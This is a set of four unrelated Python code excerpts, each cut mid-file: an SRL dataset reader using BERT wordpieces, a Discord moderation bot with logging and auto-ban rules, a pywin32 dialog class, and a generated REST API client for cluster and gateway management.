Convert a list of tokens to wordpiece tokens and offsets, as well as adding
BERT CLS and SEP tokens to the begining and end of the sentence.
A slight oddity with this function is that it also returns the wordpiece offsets
corresponding to the _start_ of words as well as the end.
We need both of these offsets (or at least, it's easiest to use both), because we need
to convert the labels to tags using the end_offsets. However, when we are decoding a
BIO sequence inside the SRL model itself, it's important that we use the start_offsets,
because otherwise we might select an ill-formed BIO sequence from the BIO sequence on top of
wordpieces (this happens in the case that a word is split into multiple word pieces,
and then we take the last tag of the word, which might correspond to, e.g, I-V, which
would not be allowed as it is not preceeded by a B tag).
For example:
`annotate` will be bert tokenized as ["anno", "##tate"].
If this is tagged as [B-V, I-V] as it should be, we need to select the
_first_ wordpiece label to be the label for the token, because otherwise
we may end up with invalid tag sequences (we cannot start a new tag with an I).
Returns
-------
wordpieces : List[str]
The BERT wordpieces from the words in the sentence.
end_offsets : List[int]
Indices into wordpieces such that `[wordpieces[i] for i in end_offsets]`
results in the end wordpiece of each word being chosen.
start_offsets : List[int]
Indices into wordpieces such that `[wordpieces[i] for i in start_offsets]`
results in the start wordpiece of each word being chosen.
"""
word_piece_tokens: List[str] = []
end_offsets = []
start_offsets = []
cumulative = 0
for token in tokens:
if self.lowercase_input:
token = token.lower()
word_pieces = self.bert_tokenizer.wordpiece_tokenizer.tokenize(token)
start_offsets.append(cumulative + 1)
cumulative += len(word_pieces)
end_offsets.append(cumulative)
word_piece_tokens.extend(word_pieces)
wordpieces = ["[CLS]"] + word_piece_tokens + ["[SEP]"]
return wordpieces, end_offsets, start_offsets
@overrides
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
ontonotes_reader = Ontonotes()
logger.info("Reading SRL instances from dataset files at: %s", file_path)
if self._domain_identifier is not None:
logger.info("Filtering to only include file paths containing the %s domain", self._domain_identifier)
for sentence in self._ontonotes_subset(ontonotes_reader, file_path, self._domain_identifier):
tokens = [Token(t) for t in sentence.words]
if not sentence.srl_frames:
# Sentence contains no predicates.
tags = ["O" for _ in tokens]
verb_label = [0 for _ in tokens]
yield self.text_to_instance(tokens, verb_label, tags)
else:
for (_, tags) in sentence.srl_frames:
verb_indicator = [1 if label[-2:] == "-V" else 0 for label in tags]
# for i in range(len(tags)):
# if tags[i] != 'O':
# tags[i] = 'I-ARG1'
yield self.text_to_instance(tokens, verb_indicator, tags)
@staticmethod
def _ontonotes_subset(ontonotes_reader: Ontonotes,
file_path: str,
domain_identifier: str) -> Iterable[OntonotesSentence]:
"""
Iterates over the Ontonotes 5.0 dataset using an optional domain identifier.
If the domain identifier is present, only examples which contain the domain
identifier in the file path are yielded.
"""
for conll_file in ontonotes_reader.dataset_path_iterator(file_path):
if domain_identifier is None or f"/{domain_identifier}/" in conll_file:
yield from ontonotes_reader.sentence_iterator(conll_file)
def text_to_instance(self, # type: ignore
tokens: List[Token],
verb_label: List[int],
tags: List[str] = None) -> Instance:
"""
We take `pre-tokenized` input here, along with a verb label. The verb label should be a
one-hot binary vector, the same length as the tokens, indicating the position of the verb
to find arguments for.
"""
# pylint: disable=arguments-differ
metadata_dict: Dict[str, Any] = {}
if self.bert_tokenizer is not None:
wordpieces, offsets, start_offsets = self._wordpiece_tokenize_input([t.text for t in tokens])
new_verbs = _convert_verb_indices_to_wordpiece_indices(verb_label, offsets)
metadata_dict["offsets"] = start_offsets
# In order to override the indexing mechanism, we need to set the `text_id`
# attribute directly. This causes the indexing to use this id.
text_field = TextField([Token(t, text_id=self.bert_tokenizer.vocab[t]) for t in wordpieces],
token_indexers=self._token_indexers)
verb_indicator = SequenceLabelField(new_verbs, text_field)
else:
text_field = TextField(tokens, token_indexers=self._token_indexers)
verb_indicator = SequenceLabelField(verb_label, text_field)
fields: Dict[str, Field] = {}
fields['tokens'] = text_field
| |
Kick from voice channel
kick_channel = discord.Object(id=afkChan)
await bot.move_member(member, kick_channel)
# else:
# embed=discord.Embed(title="Permission Denied.", description="You don't have permission to use this command.", color=0xff00f6)
# await bot.say(embed=embed)
@bot.command(pass_context = True, description = "Removes shitpost tag.")
async def cleanpost(ctx, member: discord.Member):
if ctx.message.server.id == mainServ and is_rep(ctx.message):
filePath = curDir + '/logs/db/' + member.id
embed=discord.Embed(title="Good Job!", description="**{0}** it seems **{1}** has faith in you.".format(member, ctx.message.author), color=0x27d300)
# await bot.say(embed=embed)
await bot.send_message(discord.Object(id=logAct),embed=embed)
await remove_roles(member, 'cleanpost')
# Clear punishment
try:
os.remove(filePath + '.punish')
except:
pass
# else:
# embed=discord.Embed(title="Permission Denied.", description="You don't have permission to use this command.", color=0xff00f6)
# await bot.say(embed=embed)
############################
############################
@bot.event
async def on_voice_state_update(before,after):
no = discord.Object(id=ignoreServ)
if before.server is no:
return
# if before.voice.voice_channel is None and before.id == '153999612485566464':
# msg = '<@153999612485566464> HEY SHUTUP!!'
# channel = discord.Object(id=shetChan)
# temp = await bot.send_message(channel, msg)
# await bot.server_voice_state(member=after, mute=True)
# await asyncio.sleep(15)
# await bot.delete_message(temp)
# await bot.server_voice_state(member=after, mute=False)
if before.voice.voice_channel is None or after.voice.voice_channel is None:
if before.voice.voice_channel is None and after.voice.voice_channel is not None:
# role color 117EA6 green 23D160
try:
logit = discord.utils.get(before.server.channels, id = adminLogs)
except:
pass
embed=discord.Embed(description="**" + before.mention + " joined voice channel #" + after.voice_channel.name + "**\n", color=0x23d160)
pfp = get_avatar(before)
embed.set_author(name=before, icon_url=pfp)
embed.set_footer(text="ID: " + before.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(logit, embed=embed)
await log_backup_embed(embed)
if after.voice.voice_channel is None and before.voice.voice_channel is not None:
try:
logit = discord.utils.get(after.server.channels, id = adminLogs)
except:
pass
embed=discord.Embed(description="**" + after.mention + " left voice channel #" + before.voice_channel.name + "**\n", color=0x23d160)
pfp = get_avatar(after)
embed.set_author(name=after, icon_url=pfp)
embed.set_footer(text="ID: " + after.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(logit, embed=embed)
await log_backup_embed(embed)
if after.voice_channel is before.voice_channel:
return
else:
try:
logit = discord.utils.get(before.server.channels, id = adminLogs)
except:
pass
try:
embed=discord.Embed(description="**" + after.mention + " switched voice channel `#" + before.voice.voice_channel.name + "` -> `#" + after.voice.voice_channel.name + "`**", color=0x23d160)
pfp = get_avatar(after)
embed.set_author(name=after, icon_url=pfp)
embed.set_footer(text="ID: " + after.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(logit, embed=embed)
await log_backup_embed(embed)
except:
pass
# Unhide voice channels
with open(curDir + '/include/voice') as v:
voiceID = [line.strip('\n').split(',') for line in v]
for x in range(len(voiceID)):
try:
if int(after.voice.voice_channel.id) == int(voiceID[x-1][0]):
add = discord.utils.get(after.server.roles, id = voiceID[x-1][1])
except:
pass
try:
if int(before.voice.voice_channel.id) == int(voiceID[x-1][0]):
rmv = discord.utils.get(before.server.roles, id = voiceID[x-1][1])
except:
pass
try:
if rmv is add:
return
except:
pass
if after.voice.voice_channel is not None:
await bot.add_roles(after, add)
while True:
if add in after.roles:
try:
await bot.remove_roles(after, rmv)
break
except:
break
else:
await bot.add_roles(after, add)
elif after.voice.voice_channel is None:
await bot.remove_roles(after, rmv)
while True:
if rmv in after.roles:
await bot.remove_roles(after, rmv)
else:
break
return
# if before.voice.voice_channel is not None:
# for x in range(len(voiceID)):
# if int(before.voice.voice_channel.id) == int(voiceID[x-1][0]):
# hide = discord.utils.get(after.server.roles, id = voiceID[x-1][1])
# await asyncio.sleep(5)
# if int(before.voice.voice_channel.id) == int(voiceID[x-1][0]):
# await bot.remove_roles(after, hide)
# break
# elif before.voice.voice_channel is None and after.voice.voice_channel is not None:
# for x in range(len(voiceID)):
# if int(after.voice.voice_channel.id) == int(voiceID[x-1][0]):
# add = discord.utils.get(after.server.roles, id = voiceID[x-1][1])
# await bot.add_roles(after, add)
# break
############################
############################
############################
############################
@bot.event
async def on_message(message):
# Stops bot from replying to self
if message.author == bot.user or message.author.bot:
return
# with open(curDir + '/include/special') as a:
# special = [line.strip('\n').split(',') for line in a]
# #TODO: [var] is not good solution
# if [str(message.author.id)] in special:
# print('found ' + str(message.name))
no = discord.Object(id=ignoreServ)
if message.server is no:
return
############################
############################
if is_legacy(message) and not is_in_trouble(message):
serious = discord.utils.get(message.author.server.roles, id = seriousRole)
await bot.add_roles(message.author, serious)
#++++++++++++++++++++++++++#
#++++++++++++++++++++++++++#
if is_mod(message):
pass
elif is_trusted(message):
pass
else:
if is_invite(message) and message.server.id == mainServ:
embed=discord.Embed(title="Banned!", description="**{0}** was given Banned by **ZigBot#1002** for violation of rule 8!".format(message.author), color=0xd30000)
await bot.send_message(discord.Object(id=logAct),embed=embed)
await bot.send_message(message.author, 'It\'s in the rules, no sharing discord links.\n Bye bye!')
await bot.ban(message.author)
# await bot.kick(message.author)
await bot.delete_message(message)
return
if is_aids(message) and int(message.channel.id) != int(shetChan):
msg = await bot.send_message(message.channel, 'Alright, ' + message.author.mention + ' stop abusing the new toy.')
await bot.delete_message(message)
await asyncio.sleep(10)
await bot.delete_message(msg)
if is_caps(message) and int(message.channel.id) != int(shetChan):
await bot.send_message(message.channel, 'Alright, ' + message.author.mention + ' has been warned for \'**Capital letters**\'.')
if len(message.mentions) >= 5:
await bot.send_message(message.channel, 'Alright, ' + message.author.mention + ' has been shitposted for \'**Mass mentions**\'.')
await punish_shitpost(message)
#++++++++++++++++++++++++++#
#++++++++++++++++++++++++++#
# if is_caps(message):
# lowered = message.content.lower()
# msg = await bot.send_message(message.channel, "||*turns caps off*|| " + str(message.author) + " ***Said:*** - " + lowered)
# await bot.delete_message(message)
# if not is_mod:
# await asyncio.sleep(60)
# await bot.delete_message(msg)
if message.content.lower().startswith('!refuel'):
msg = await bot.send_message(message.channel,'Helicopter is refueled and ready to... physically remove... so to speak...\nhttps://cdn.discordapp.com/attachments/509245339664908299/522448178138578964/1512796577930.gif')
await bot.delete_message(message)
await asyncio.sleep(timeout)
await bot.delete_message(msg)
if is_polchan(message):
if message.content.lower().startswith('poll:'):
await bot.add_reaction(message, '\U0001F44D')
await bot.add_reaction(message, '\U0001F44E')
await bot.add_reaction(message, '\U0001F937')
else:
msg = await bot.send_message(message.channel, '**Your message will be removed. __Copy it now!__**\nYou can read this message after you copy yours.\n\nThis is not in a valid poll format "Poll: ".\nIf this was poll, please type "Poll: " first, then paste in your message.\nIf this is not a poll, continue the discussion in <#549269596926902282>.\nThank you.')
await asyncio.sleep(30)
await bot.delete_message(message)
await asyncio.sleep(60)
await bot.delete_message(msg)
if is_polenabled(message):
if message.content.lower().startswith('poll:'):
await bot.add_reaction(message, '\U0001F44D')
await bot.add_reaction(message, '\U0001F44E')
await bot.add_reaction(message, '\U0001F937')
if ' iq' in message.content.lower() or 'iq ' in message.content.lower():
msg = await bot.send_message(message.channel, message.author.mention + ', there are better arguments than IQ to make your case.\nhttps://www.independent.co.uk/news/science/iq-tests-are-fundamentally-flawed-and-using-them-alone-to-measure-intelligence-is-a-fallacy-study-8425911.html\nhttps://www.cell.com/neuron/fulltext/S0896-6273(12)00584-3')
await asyncio.sleep(timeout)
await bot.delete_message(msg)
# if 'smart' in message.content.lower():
# x = randint(0,5)
# brainletURL = brainlet[x].rstrip()
# msg = await bot.send_message(message.channel, 'I is r b smartr den u.\n' + brainletURL)
# await asyncio.sleep(5)
# await bot.delete_message(msg)
if message.content.startswith('!disboard bump'):
# Needed vars
bumServ = message.server.id
bumChan = message.channel.id
bumMemb = message.author.id
channel = discord.Object(id=bumChan)
curTime = datetime.now()
newTime = datetime.now() + timedelta(hours=2)
filePath = curDir + '/logs/db/' + bumServ
# Replaces member and channel
# Old info not needed only updated
oldMemb = open(filePath + '.member', 'w+')
oldMemb.write("%s\r\n" % (bumMemb))
oldMemb.close()
oldChan = open(filePath + '.channel', 'w+')
oldChan.write("%s\r\n" % (bumChan))
oldChan.close()
# Loads existing needed time data
# If not found, creates data
try:
t = open(filePath + '.time')
tStrip = t.readlines()
oldTime = tStrip[0].rstrip()
except:
t = open(filePath + '.time', 'w+')
t.write("%s\r\n" % (str(newTime)))
oldTime = str(newTime)
t.close()
lastBump = datetime.strptime(oldTime, dateFormat)
# Tests if 2 hours has passed
# If not, it lets you know it'll remind you later
# It always updates member and channel
if curTime < lastBump:
diff = int(int((lastBump - curTime).seconds)/60) + 1
await bot.send_message(channel, 'I\'ll remind you to bump here in ' + str(diff) + ' minutes.')
else:
await bot.send_message(channel, 'I\'ll remind you in 120 mins to bump disboard again.')
t = open(filePath + '.time', 'w+')
t.write("%s\r\n" % (str(newTime)))
t.close()
# allow disboard bump stop
if message.content.startswith('!disboard stop') and message.author.server_permissions.administrator:
disboard = discord.utils.get(message.server.members, name='DISBOARD')
bumServ = message.server.id
bumChan = message.channel.id
filePath = curDir + '/logs/db/' + bumServ
channel = discord.Object(id=bumChan)
msg = await bot.wait_for_message(timeout=3, author=disboard)
try:
os.remove(filePath + '.time')
await bot.delete_message(msg)
await bot.send_message(channel, 'I\'ll stop reminding you for now. `!disboard bump` to start again.')
except:
await bot.send_message(channel, 'I\'m already set to not remind you. Please `!disboard bump` to start again.')
if message.content.lower().startswith('.iam busy') and message.author.server.id == mainServ:
if message.author.server_permissions.administrator:
msg = await bot.send_message(message.channel,'As much as I would like to, I\'m not able to set you to busy.\n It\'s out of my power.')
await bot.delete_message(message)
await asyncio.sleep(10)
await bot.delete_message(msg)
return
error = discord.utils.get(message.server.members, name='ZigBot')
msg = await bot.wait_for_message(timeout=3, author=error)
await bot.delete_message(msg)
filePath = curDir + '/logs/db/' + message.author.id
roles_busy = list(message.author.roles)
with open(filePath + '.busy', 'w+') as f:
for x in range(len(roles_busy)):
f.write('%s\n' % roles_busy[x-1].id)
await bot.remove_roles(message.author, roles_busy[x-1])
await asyncio.sleep(2e-2)
addRole = discord.utils.get(message.server.roles, id = busyRole)
await bot.add_roles(message.author, addRole)
await bot.delete_message(message)
return
if message.content.lower().startswith('.iamn busy') and message.author.server.id == mainServ:
error = discord.utils.get(message.server.members, name='ZigBot')
msg = await bot.wait_for_message(timeout=3, author=error)
await bot.delete_message(msg)
filePath = curDir + '/logs/db/' + message.author.id
with open(filePath + '.busy') as f:
roles_active = [line.strip('\n') for line in f]
for x in range(len(roles_active)):
addRole = discord.utils.get(message.server.roles, id = str(roles_active[x-1]))
await bot.add_roles(message.author, addRole)
await asyncio.sleep(2e-2)
rmRole = discord.utils.get(message.server.roles, id = busyRole)
await bot.remove_roles(message.author, rmRole)
| |
field_t, field_w, field_h), cs | field_styles])
if callback:
dlg.append (["BUTTON", "...", self.IDC_CALLBACK_BASE + i, (field_l + field_w + self.GUTTER_W, field_t, self.CALLBACK_W, self.CONTROL_H), cs | win32con.WS_TABSTOP | win32con.BS_PUSHBUTTON])
control_t += display_h + self.GUTTER_H
i += 1
if self.progress_callback:
self._progress_id = self.IDC_FIELD_BASE + i
field_t = control_t
field_w = self.W - (2 * self.GUTTER_W)
field_l = self.GUTTER_W
field_h = self.CONTROL_H
field_styles = win32con.SS_LEFT
dlg.append (["STATIC", None, self.IDC_FIELD_BASE + i, (field_l, field_t, field_w, field_h), cs | field_styles])
control_t += field_h + self.GUTTER_H
cs = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_TABSTOP | win32con.BS_PUSHBUTTON
button_t = control_t
for i, (caption, id) in enumerate (reversed (self.BUTTONS)):
field_h = self.CONTROL_H
dlg.append (["BUTTON", caption, id, (self.W - ((i + 1) * (self.GUTTER_W + self.BUTTON_W)), button_t, self.BUTTON_W, field_h), cs])
control_t += field_h + self.GUTTER_H
dlg.insert (0, [self.title, (0, 0, self.W, control_t), style, None, (9, "Lucida Sans Unicode"), None, dlg_class_name])
return dlg
class Dialog (BaseDialog):
ur"""A general-purpose dialog class for collecting arbitrary information in
text strings and handing it back to the user. Only Ok & Cancel buttons are
allowed, and all the fields are considered to be strings. The list of
fields is of the form: [(label, default), ...] and the values are saved
in the same order.
"""
def __init__ (self, title, fields, progress_callback=core.UNSET, parent_hwnd=0):
ur"""Initialise the dialog with a title and a list of fields of
the form [(label, default), ...].
"""
BaseDialog.__init__ (self, title, parent_hwnd)
self.progress_callback = progress_callback
self.fields = list (fields)
if not self.fields:
raise RuntimeError ("Must pass at least one field")
self.results = []
self.progress_thread = core.UNSET
self.progress_cancelled = win32event.CreateEvent (None, 1, 0, None)
def run (self):
ur"""The heart of the dialog box functionality. The call to DialogBoxIndirect
kicks off the dialog's message loop, finally returning via the EndDialog call
in OnCommand
"""
message_map = {
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_SIZE: self.OnSize,
win32con.WM_GETMINMAXINFO : self.OnMinMaxInfo,
self.WM_PROGRESS_MESSAGE : self.OnProgressMessage,
self.WM_PROGRESS_COMPLETE : self.OnProgressComplete
}
return wrapped (
win32gui.DialogBoxIndirect,
self.hinst,
self._get_dialog_template (),
self.parent_hwnd,
message_map
)
def corners (self, l, t, r, b):
ur"""Designed to be subclassed (eg by :class:`InfoDialog`). By
default simply returns the values unchanged.
"""
return l, t, r, b
def OnInitDialog (self, hwnd, msg, wparam, lparam):
ur"""Attempt to position the dialog box more or less in
the middle of its parent (possibly the desktop). Then
force a resize of the dialog controls which should take
into account the different label lengths and the dialog's
new size.
"""
self.hwnd = hwnd
#
# If you want to have a translucent dialog,
# enable the next block.
#
if False:
wrapped (
win32gui.SetWindowLong,
self.hwnd,
win32con.GWL_EXSTYLE,
win32con.WS_EX_LAYERED | wrapped (
win32gui.GetWindowLong,
self.hwnd,
win32con.GWL_EXSTYLE
)
)
wrapped (
win32gui.SetLayeredWindowAttributes,
self.hwnd,
255,
(255 * 80) / 100,
win32con.LWA_ALPHA
)
pythoncom.RegisterDragDrop (
hwnd,
pythoncom.WrapObject (
_DropTarget (hwnd),
pythoncom.IID_IDropTarget,
pythoncom.IID_IDropTarget
)
)
for i, (field, default, callback) in enumerate (self.fields):
id = self.IDC_FIELD_BASE + i
self._set_item (id, default)
parent = self.parent_hwnd or DESKTOP
l, t, r, b = self.corners (*wrapped (win32gui.GetWindowRect, self.hwnd))
r = min (r, l + self.MAX_W)
dt_l, dt_t, dt_r, dt_b = wrapped (win32gui.GetWindowRect, parent)
cx = int (round ((dt_r - dt_l) / 2))
cy = int (round ((dt_b - dt_t) / 2))
centre_x, centre_y = wrapped (win32gui.ClientToScreen, parent, (cx, cy))
dx = int (round (centre_x - (r / 2)))
dy = int (round (centre_y - (b / 2)))
wrapped (win32gui.MoveWindow, self.hwnd, dx, dy, r - l, b - t, 0)
l, t, r, b = wrapped (win32gui.GetClientRect, self.hwnd)
self._resize (r - l, b - t, 0)
return True
def _resize (self, dialog_w, dialog_h, repaint=1):
ur"""Attempt to resize the controls on the dialog, spreading
then horizontally to cover the full extent of the dialog
box, with left-aligned labels and right-aligned buttons.
"""
def coords (hwnd, id):
ctrl = wrapped (win32gui.GetDlgItem, hwnd, id)
l, t, r, b = wrapped (win32gui.GetWindowRect, ctrl)
l, t = wrapped (win32gui.ScreenToClient, hwnd, (l, t))
r, b = wrapped (win32gui.ScreenToClient, hwnd, (r, b))
return ctrl, l, t, r, b
hDC = wrapped (win32gui.GetDC, self.hwnd)
try:
label_w, label_h = max (wrapped (win32gui.GetTextExtentPoint32, hDC, label or "") for label, _, _ in self.fields)
finally:
wrapped (win32gui.ReleaseDC, self.hwnd, hDC)
for i, (field, default, callback) in enumerate (self.fields):
if field is not None:
label, l, t, r, b = coords (self.hwnd, self.IDC_LABEL_BASE + i)
wrapped (win32gui.MoveWindow, label, self.GUTTER_W, t, label_w, b - t, repaint)
label_r = self.GUTTER_W + label_w
if callback:
callback_button, l, t, r, b = coords (self.hwnd, self.IDC_CALLBACK_BASE + i)
callback_w = r - l
callback_l = dialog_w - self.GUTTER_W - callback_w
MoveWindow (callback_button, callback_l, t, r - l, b - t, repaint)
else:
callback_w = 0
else:
label_r = callback_w = 0
field, l, t, r, b = coords (self.hwnd, self.IDC_FIELD_BASE + i)
field_l = label_r + self.GUTTER_W
field_w = dialog_w - self.GUTTER_W - field_l - (callback_w + self.GUTTER_W if callback_w else 0)
MoveWindow (field, field_l, t, field_w, b - t, repaint)
if self._progress_id:
field, l, t, r, b = coords (self.hwnd, self._progress_id)
field_w = dialog_w - 2 * self.GUTTER_W
MoveWindow (field, l, t, field_w, b - t, repaint)
for i, (caption, id) in enumerate (reversed (self.BUTTONS)):
button, l, t, r, b = coords (self.hwnd, id)
MoveWindow (button, dialog_w - ((i + 1) * (self.GUTTER_W + (r - l))), t, r - l, b - t, repaint)
def _get_item (self, item_id):
ur"""Return the current value of an item in the dialog.
"""
hwnd = wrapped (win32gui.GetDlgItem, self.hwnd, item_id)
class_name = wrapped (win32gui.GetClassName, hwnd)
if class_name == "Edit":
try:
#
# There is a bug/feature which prevents empty dialog items
# from having their text read. Assume any error means that
# the control is empty.
#
return wrapped (win32gui.GetDlgItemText, self.hwnd, item_id).decode ("mbcs")
except:
return ""
elif class_name == "Button":
return bool (SendMessage (hwnd, win32con.BM_GETCHECK, 0, 0))
elif class_name == "ComboBox":
field, default, callback = self.fields[item_id - self.IDC_FIELD_BASE]
return default[SendMessage (hwnd, win32con.CB_GETCURSEL, 0, 0)]
elif class_name == "Static":
return None
else:
raise RuntimeError ("Unknown class: %s" % class_name)
def _set_item (self, item_id, value):
ur"""Set the current value of an item in the dialog
"""
item_hwnd = wrapped (win32gui.GetDlgItem, self.hwnd, item_id)
class_name = wrapped (win32gui.GetClassName, item_hwnd)
styles = wrapped (win32gui.GetWindowLong, self.hwnd, win32con.GWL_STYLE)
if class_name == "Edit":
if isinstance (value, datetime.date):
value = value.strftime ("%d %b %Y")
value = unicode (value).replace (u"\r\n", u"\n").replace (u"\n", u"\r\n")
wrapped (win32gui.SetDlgItemText, self.hwnd, item_id, value)
elif class_name == "Button":
#~ if styles & win32con.BS_CHECKBOX:
SendMessage (item_hwnd, win32con.BM_SETCHECK, int (value), 0)
#~ elif styles & win32con.BS_RADIOBUTTON:
elif class_name == "ComboBox":
for item in value:
if isinstance (item, tuple):
item = item[0]
SendMessage (item_hwnd, win32con.CB_ADDSTRING, 0, utils.string_as_pointer (str (item)))
SendMessage (item_hwnd, win32con.CB_SETCURSEL, 0, 0)
elif class_name == "Static":
wrapped (win32gui.SetDlgItemText, self.hwnd, item_id, unicode (value))
else:
raise RuntimeError ("Unknown class: %s" % class_name)
def OnSize (self, hwnd, msg, wparam, lparam):
"""If the dialog box is resized, force a corresponding resize
of the controls
"""
w = win32api.LOWORD (lparam)
h = win32api.HIWORD (lparam)
self._resize (w, h)
return 0
def OnMinMaxInfo (self, hwnd, msg, wparam, lparam):
ur"""Prevent the dialog from resizing vertically by extracting
the window's current size and using the minmaxinfo message
to set the maximum & minimum window heights to be its current height.
"""
dlg_l, dlg_t, dlg_r, dlg_b = wrapped (win32gui.GetWindowRect, hwnd)
#
# If returning from minmization, do nothing
#
if wrapped (win32gui.GetClientRect, hwnd) == (0, 0, 0, 0):
return 0
#
# MINMAXINFO is a struct of 5 POINT items, each of which
# is a pair of LONGs. We extract the structure into a list,
# set the Y coord of MaxTrackSize and of MinTrackSize to be
# the window's current height and write the data back into
# the same place.
#
POINT_FORMAT = "LL"
MINMAXINO_FORMAT = 5 * POINT_FORMAT
data = win32gui.PyGetString (lparam, struct.calcsize (MINMAXINO_FORMAT))
minmaxinfo = list (struct.unpack (MINMAXINO_FORMAT, data))
minmaxinfo[9] = minmaxinfo[7] = dlg_b - dlg_t
win32gui.PySetMemory (lparam, struct.pack (MINMAXINO_FORMAT, *minmaxinfo))
return | |
(optional)
:param int id: (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method status_stack" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `status_stack`")
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/stacks/{id}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_gateway_topologies(self, id, **kwargs):
"""
update topologies of a gateway
Gateway is an Apache Knox Gateway, which is an Application Gateway for interacting with REST APIs andUIs of Apache Hadoop deployments. Provides Authentication and other services.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_gateway_topologies(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: (required)
:param UpdateGatewayTopologiesJson body:
:return: GatewayJson
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_gateway_topologies_with_http_info(id, **kwargs)
else:
(data) = self.update_gateway_topologies_with_http_info(id, **kwargs)
return data
def update_gateway_topologies_with_http_info(self, id, **kwargs):
"""
update topologies of a gateway
Gateway is an Apache Knox Gateway, which is an Application Gateway for interacting with REST APIs andUIs of Apache Hadoop deployments. Provides Authentication and other services.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_gateway_topologies_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: (required)
:param UpdateGatewayTopologiesJson body:
:return: GatewayJson
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_gateway_topologies" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update_gateway_topologies`")
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/stacks/{id}/cluster/gateway', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GatewayJson',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upgrade_cluster(self, id, **kwargs):
"""
upgrade the Ambari version
Ambari is used to provision the Hadoop clusters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upgrade_cluster(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: (required)
:param AmbariRepoDetails body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upgrade_cluster_with_http_info(id, **kwargs)
else:
(data) = self.upgrade_cluster_with_http_info(id, **kwargs)
return data
def upgrade_cluster_with_http_info(self, id, **kwargs):
"""
upgrade the Ambari version
Ambari is used to provision the Hadoop clusters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upgrade_cluster_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: (required)
:param AmbariRepoDetails body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upgrade_cluster" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `upgrade_cluster`")
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/stacks/{id}/cluster/upgrade', 'POST',
path_params,
query_params,
header_params,
